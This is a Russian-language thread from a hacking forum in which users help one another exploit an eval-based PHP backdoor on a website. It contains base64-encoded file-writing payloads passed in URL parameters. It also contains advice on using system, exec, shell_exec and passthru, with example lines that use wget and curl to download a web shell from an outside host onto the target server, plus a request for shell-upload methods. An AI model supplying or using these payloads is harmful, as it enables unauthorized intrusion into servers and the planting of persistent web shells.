HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.01.2012, 17:05
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Пытаюсь создать файл со следующим содержимым

file_put_contents('lala.php', '');

http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udG VudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);

mq=on

и поэтому адресу должен появиться файл

http://www.site.com/lala.php

но вместо этого:

404.

Запрошенный Вами документ отсутствует на сервере.
 
Ответить с цитированием

  #2  
Старый 31.01.2012, 17:06
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от er9j6@  
Пытаюсь создать файл со следующим содержимым
file_put_contents('lala.php', '');
http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udG VudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);
mq=on
и поэтому адресу должен появиться файл
http://www.site.com/lala.php
но вместо этого:
404.
Запрошенный Вами документ отсутствует на сервере.
ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда

base64_decode($_GET[a]);&a=твой_base64_код
 
Ответить с цитированием

  #3  
Старый 31.01.2012, 17:25
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от Konqi  
ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда
bas64_decode($_GET[a]);&a=твой_base64_код
Делаю

http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=

и тут

http://www.site.com/lala.php

все равно выводит

404.

Запрошенный Вами документ отсутствует на сервере.
 
Ответить с цитированием

  #4  
Старый 31.01.2012, 18:01
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от er9j6@  
Делаю
http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=
и тут
http://www.site.com/lala.php
все равно выводит
404.
Запрошенный Вами документ отсутствует на сервере.
если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции
 
Ответить с цитированием

  #5  
Старый 31.01.2012, 18:04
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от Konqi  
если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции
Konqi

какие другие функции можно еще использовать?
 
Ответить с цитированием

  #6  
Старый 31.01.2012, 18:11
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от er9j6@  
Konqi
какие другие функции можно еще использовать?
можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть

пример

system($_GET[a]);&a=wget http://site.ru/shell.php

или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);

неоднакратно обсуждалось это тема
 
Ответить с цитированием

  #7  
Старый 31.01.2012, 18:25
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от Konqi  
можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть
пример
system($_GET[a]);&a=wget http://site.ru/shell.php
или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);
неоднакратно обсуждалось это тема
у меня в шаблоне записан eval, его что нужно заменить sistem?

ipsclass->input['cid'] = 1">

ipsclass->input['id'])">
 
Ответить с цитированием

  #8  
Старый 31.01.2012, 18:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от er9j6@  
у меня в шаблоне записан eval, его что нужно заменить sistem?
ipsclass->input['cid'] = 1">
ipsclass->input['id'])">

не надо ничем заменить, вместо file_put_contents, используйте те функции которые я написал

er9j6@ достаточно зафлудили в теме, листайте топик, уверен найдете все ответы на ваши вопросы
 
Ответить с цитированием

  #9  
Старый 31.01.2012, 18:29
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

er9j6@,

у тебя хостинг от мастерхост, смотрел phpinfo, там отключены системные функции.
 
Ответить с цитированием

  #10  
Старый 31.01.2012, 18:33
Tr[1]x
Познающий
Регистрация: 20.08.2010
Сообщений: 30
С нами: 8278166

Репутация: 0
По умолчанию

Существуют ли аналоги Goolag Scanner?

И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.